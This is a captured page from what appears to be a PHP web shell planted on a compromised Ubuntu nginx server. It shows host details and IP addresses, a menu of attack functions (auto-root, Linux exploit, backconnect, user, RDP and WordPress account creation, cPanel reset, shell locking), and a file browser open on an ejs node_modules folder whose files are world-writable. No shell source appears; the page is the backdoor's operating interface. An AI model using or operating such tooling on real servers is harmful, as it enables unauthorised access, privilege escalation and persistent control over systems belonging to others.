Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
ejs /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
LICENSE
11.09
KB
-rw-rw-rw-
README.md
13.03
KB
-rw-rw-rw-
ejs.js
48.96
KB
-rw-rw-rw-
ejs.min.js
23.75
KB
-rw-rw-rw-
jakefile.js
2.49
KB
-rw-rw-rw-
package.json
906
B
-rw-rw-rw-
usage.txt
1.64
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ejs", "description": "Embedded JavaScript templates", "keywords": [ "template", "engine", "ejs" ], "version": "3.1.10", "author": "Matthew Eernisse <mde@fleegix.org> (http://fleegix.org)", "license": "Apache-2.0", "bin": { "ejs": "./bin/cli.js" }, "main": "./lib/ejs.js", "jsdelivr": "ejs.min.js", "unpkg": "ejs.min.js", "repository": { "type": "git", "url": "git://github.com/mde/ejs.git" }, "bugs": "https://github.com/mde/ejs/issues", "homepage": "https://github.com/mde/ejs", "dependencies": { "jake": "^10.8.5" }, "devDependencies": { "browserify": "^16.5.1", "eslint": "^6.8.0", "git-directory-deploy": "^1.5.1", "jsdoc": "^4.0.2", "lru-cache": "^4.0.1", "mocha": "^10.2.0", "uglify-js": "^3.3.16" }, "engines": { "node": ">=0.10.0" }, "scripts": { "test": "npx jake test" } }
Close